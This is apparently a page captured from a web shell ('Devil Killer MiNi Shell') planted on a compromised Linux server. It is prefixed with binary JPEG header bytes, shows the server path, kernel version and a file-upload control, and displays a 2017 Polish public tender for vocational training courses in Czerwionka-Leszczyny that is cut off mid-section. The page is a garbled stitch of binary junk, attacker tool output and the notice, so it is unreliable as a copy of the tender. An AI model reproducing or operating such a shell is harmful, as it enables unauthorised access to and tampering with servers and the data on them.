JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170113/7892-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.czerwionka-leszczyny.pl/bip/' target='_blank'>http://www.czerwionka-leszczyny.pl/bip/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 7892 - 2017
              z dnia 2017-01-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Czerwionka-Leszczyny: Realizacja usług o charakterze edukacyjnym - szkoleń zawodowych dla uczestników Projektu pozakonkursowego pn. Program integracji społecznej  i zawodowej w powiecie rybnickim współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020. Priorytet IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Program integracji społecznej  i zawodowej w powiecie rybnickim współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020. Priorytet IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Ośrodek Pomocy Społecznej w Czerwionce-Leszczynach, krajowy numer identyfikacyjny
              00344571900000, ul.
              ul. 3 Maja 
              36b,
              44230  
              Czerwionka-Leszczyny, woj.
              śląskie, państwo
              Polska, tel.
              0-32 431 20 39; 431 11 66, e-mail
              ops@czerwionka-leszczyny.com.pl, faks
              .
              <br />
              Adres strony internetowej (URL): www.czerwionka-leszczyny.pl/bip/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.czerwionka-leszczyny.pl/bip/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Forma pisemna - za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście, za pośrednictwem posłańca<br />
                Adres:
                <br />Ośrodek Pomocy Społecznej ul. 3 Maja 36b 44-230 Czerwionka-Leszczyny</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Realizacja usług o charakterze edukacyjnym - szkoleń zawodowych dla uczestników Projektu pozakonkursowego pn. Program integracji społecznej  i zawodowej w powiecie rybnickim współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020. Priorytet IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym<br /><b>Numer referencyjny: </b>OPS/KIS.NN.341/1/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest świadczenie tzw. usług o charakterze edukacyjnym polegających na zorganizowaniu i przeprowadzeniu szkoleń zawodowych dla uczestników projektu pozakonkursowy pn. Program integracji społecznej  i zawodowej w powiecie rybnickim współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020. Priorytet IX Włączenie społeczne, Działanie 9.1 Aktywna integracja, Poddziałanie 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym.

Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub więcej części zamówienia (zadań). Oferta winna obejmować cały zakres rzeczowy zadania. 

Podział przedmiotu zamówienia na zadania przedstawia się następująco: 

Zadanie nr 1: 
Przeprowadzenie szkolenia w specjalności operator wózka jezdniowego o napędzie silnikowym dla typu: wózki podnośnikowe z wyłączeniem specjalizowanych (kategoria urządzeń II WJO)  z wymianą butli LPG. 
Liczba uczestników: 16 osób. 
 Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie zajęć teoretycznych oraz praktycznych w wymiarze niezbędnym do przystąpienia do egzaminu przed Urzędem Dozoru Technicznego (w wymiarze nie niższym niż 60 godzin lekcyjnych) celem uzyskania uprawnień dla typu: wózki podnośnikowe z wyłączeniem specjalizowanych (kategoria urządzeń II WJO) z wymianą butli LPG, ważnych u każdego pracodawcy (zaświadczenie kwalifikacyjne UDT).
2)Szkolenie winno zostać przeprowadzone w 2 grupach szkoleniowych, przy czym liczebność grupy nie może przekraczać 10 osób.
3)Przeprowadzenie szkolenia w oparciu o program szkolenia zatwierdzony lub opracowany przez Urząd Dozoru Technicznego.
4)Zorganizowanie egzaminu przeprowadzonego przez Urząd Dozoru Technicznego potwierdzającego nabycie uprawnień dla typu: wózki podnośnikowe z wyłączeniem specjalizowanych (kategoria urządzeń II WJO) z wymianą butli LPG. 
5)Zajęcia teoretyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
6)Zajęcia praktyczne z zakresu obsługi i manewrowania wózkiem widłowym winny odbywać się na terenie Gminy i Miasta Czerwionka-Leszczyny albo w sąsiedniej gminie albo mieście. 
7)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
8)Termin rozpoczęcia szkolenia ustala się na dzień 20 lutego 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 6 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  



Zadanie nr 2:
Przeprowadzenie szkolenia spawanie elektrodą nietopliwą w osłonie gazu obojętnego (TIG)
Liczba uczestników: 7 osób. 
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie zajęć w wymiarze nie mniejszym niż 110 godzin lekcyjnych;
2)Zorganizowanie egzaminu państwowego przeprowadzonego przed komisją egzaminacyjną;
3)Zajęcia teoretyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
4)Zajęcia praktyczne winny odbywać się na terenie Gminy i Miasta Czerwionka                    -Leszczyny albo w sąsiedniej gminie albo mieście.
9)Termin rozpoczęcia szkolenia ustala się na dzień 7 marca 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 21 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  


Zadanie nr 3:
Przeprowadzenia szkolenia palacza - obsługa kotłów wodnych centralnego ogrzewania na paliwa stałe, ciekłe i gazowe o mocy przekraczającej 50kw (z uprawnieniami).
Liczba uczestników: 24 osoby.
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie zajęć w wymiarze niezbędnym do przystąpienia do egzaminu przed komisją egzaminacyjną (nie mniejszym niż 45 godzin lekcyjnych).
2)Szkolenie winno zostać przeprowadzone w 2 grupach szkoleniowych, przy czym liczebność grupy nie może przekraczać 12 osób,
3)Przeprowadzenie szkolenia w oparciu o program szkolenia niezbędny do zdania egzaminu i nabycia kompetencji.
4)Zorganizowanie egzaminu państwowego przeprowadzonego przed komisją egzaminacyjną.
5)Zajęcia teoretyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
6)W razie konieczności przeprowadzenia zajęć praktycznych - zajęcia te winny odbywać się na terenie Gminy i Miasta Czerwionka-Leszczyny albo w sąsiedniej gminie albo mieście.
7)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
10)Termin zakończenia szkolenia i egzaminów ustala się na dzień 18 lutego 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  


Zadanie nr 4:
Przeprowadzenie szkolenia o specjalności opiekun/opiekunka osób starszych oraz opiekun/opiekunka dzieci.
Liczba uczestników: 6 osób. 

Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Celem szkolenia jest przygotowanie słuchaczy do podjęcia pracy lub rozpoczęcia                                i prowadzenia działalności polegającej na świadczeniu usług w zakresie opieki nad osobami starszymi oraz dziećmi.
2)Przeprowadzenie zajęć w wymiarze nie mniejszym niż 100 godzin lekcyjnych).
3)Program szkolenia winien zawierać dwa bloki tematyczne:
- Opieka nad osobami starszymi obejmujący: podstawy psychologii, edukacja zdrowotna, zmiany zachodzące w organizmie człowieka pod wpływem starzenia się, podstawy gerontologii, etyka zawodowa, metody terapii i aktywizacji, rola i zadania opiekuna osób starszych, bezpieczeństwo i higiena pracy, 
- Opieka nad dziećmi obejmująca: zajęcia dotyczące psychologii dziecięcej, profesjonalnej opieki, zabaw edukacyjnych. Powinny również obejmować biomedyczne podstawy rozwoju człowieka, higienę małego dziecka, żywienie  w różnych fazach rozwoju dziecka, metodykę pracy z dziećmi w tym kreatywne zabawy, organizacja zabaw dla dzieci w kreatywny i rozwijający sposób, ciekawe pomysły na mądre spędzenie czasu z dzieckiem.  
4)Szkolenia winny obejmować zajęcia praktyczne w zakresie:
- pomoc w utrzymaniu higieny osobistej osoby starszej.  
- zmianę bielizny osobistej, pościelowej, przesłanie łóżka.
- pomoc przy załatwianiu potrzeb fizjologicznych  podanie basenu, pomoc                    w dojściu do toalety.
- zapobieganie powstawaniu odleżyn i odparzeń.
- zmianę pozycji obłożenie chorego w łóżku. 
- opiekę zalecaną przez lekarza - podawanie leków, okłady, nacieranie, karmienie chorego. 
- zapoznanie się instytucjami powołanymi do opieki nad osobami starszymi                                                      i niepełnosprawnymi.
5)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
6)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
7)Termin rozpoczęcia szkolenia ustala się na dzień 7 marca 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 20 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  



Zadanie nr 5:
Przeprowadzenie szkolenia z obsługi kasy fiskalnej.
Liczba uczestników: 13 osób.

Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie szkolenia w wymiarze nie mniejszym niż 15 godzin lekcyjnych w oparciu o program szkolenia niezbędny do nabycia kompetencji.
2)Szkolenie winno zostać przeprowadzone w 2 grupach szkoleniowych, przy czym liczebność grupy nie może przekraczać 8 osób,
3)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
4)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
12)Termin rozpoczęcia szkolenia ustala się na dzień 29 marca 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 30 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  


Zadanie nr 6:
Przeprowadzenie szkolenia w specjalności stylista paznokci.
Liczba uczestników: 6 osób.
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie szkolenia w wymiarze nie mniejszym niż 80 godzin lekcyjnych w oparciu o program szkolenia niezbędny do nabycia kompetencji.
2)Program szkolenia winien zawierać:
 Budowa paznokcia naturalnego
 Choroby paznokci
 Manicure metodą biologiczną
 Nauka profesjonalnego malowania płytki paznokcia
 Wzornictwo tradycyjne za pomocą lakierów
 Masaż dłoni i zabiegi pielęgnacyjne
 Nakładanie żelu/akrylu
 Zabieg uzupełniający
 Wzmocnienie naturalnych paznokci (żel, akryl)
 Usuwanie paznokci żelowych
 Reperacja złamanych i naderwanych paznokci
Przedłużanie paznokci 
Naklejanie naklejek, cyrkonii
Przepisy BHP na stanowisku pracy
3)Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do wykonywania zawodu w w/w zakresie, które profesjonalnie i od podstaw przygotuje do zawodu stylisty paznokci, oraz w praktyczny sposób nauczy zagadnień wymaganych w pracy zawodowej jako stylista paznokci, da pełną swobodę posługiwania się wszystkimi preparatami kosmetycznymi, zapozna również uczestników z nowościami pojawiającymi się na rynku.
4)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
5)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
13)Termin zakończenia szkolenia i egzaminów ustala się na dzień 24 lutego 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  


Zadanie nr 7:
Przeprowadzenie szkolenia w specjalności wizażysta / stylista.
Liczba uczestników: 2 osoby.
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie szkolenia w wymiarze nie mniejszym niż 50 godzin lekcyjnych w oparciu o program szkolenia niezbędny do nabycia kompetencji.
2)Program szkolenia winien zawierać.
Podstawy kosmetologii na potrzeby wizażu.
Budowa, skład, choroby skóry, włosów i paznokci
Makijaż- techniki, rodzaje, makijaż okolicznościowy
Stylizacja paznokci- techniki, rodzaje zdobień, dekoracje okolicznościowe
Dobór fryzur, układanie włosów, codzienne i okazjonalne
Stylizacja i dobór kolorystki w ubiorze, makijażu i fryzurze
Akcesoria i kosmetyki wykorzystywane w stylizacji i wizażu
Kreowanie wizerunku pracownicy, komunikacja z klientem
Przepisy BHP na stanowisku pracy
Organizacja, przystosowanie stanowiska pracy stylistki-wizażystki, dobór urządzeń i wyposażenia
3)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
4)Uczestnikami szkolenia mogą być inne osoby. Wykonawca może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
5)Termin rozpoczęcia szkolenia ustala się na dzień 27 lutego 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 7 marca 2017r.   

Zadanie nr 8:
Przeprowadzenie szkolenia z obsługi klienta i techniki sprzedaży.
Liczba uczestników: 14 osób.
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie szkolenia w wymiarze nie mniejszym niż 40 godzin lekcyjnych w oparciu o program szkolenia niezbędny do nabycia kompetencji.
2)Szkolenie winno zostać przeprowadzone w 2 grupach szkoleniowych, przy czym liczebność grupy nie może przekraczać 7 osób,

3)Program szkolenia winien zawierać zagadnienia:
psychologii sprzedaży,
techniki sprzedaży,
profesjonalna obsługa klienta,
prezentacja produktów i usług,
umiejętność komunikacji z Klientem,
skuteczna negocjacja.
4)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
5)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
6)Termin rozpoczęcia szkolenia ustala się na dzień 21 marca 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 28 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  

<br /><br /><b>II.5) Główny kod CPV: </b>80530000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 06/03/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 21/03/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 18/02/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 20/03/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 30/03/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 24/02/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 07/03/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 28/01/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                a)w stosunku do wszystkich zadań: 
posiadanie uprawnień do prowadzenia szkoleń płatnych ze środków publicznych tzn. posiadanie wpisu o którym mowa w art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2016r., poz. 645,z późn. zm.), tj. wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej,
b)	w stosunku do zadania 2: 
	posiadają potwierdzenia objęcia ośrodka szkoleniowego lub kursu spawania merytorycznym nadzorem Instytutu Spawalnictwa w Gliwicach lub innego uprawnionej  jednostki sprawującej nadzór nad ośrodkami szkolącymi spawaczy, tj. posiada aktualny atest lub jednorazową zgodę na przeprowadzenie kursu spawania - wydane przez Instytut Spawalnictwa w Gliwicach lub inną uprawnioną  jednostkę sprawującą nadzór nad ośrodkami szkolącymi spawaczy,
<br />
                Informacje dodatkowe
                posiadanie wpis o którym mowa w art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2016r., poz. 645,z późn. zm.), tj. wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej,<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)w stosunku do zadania 1: 
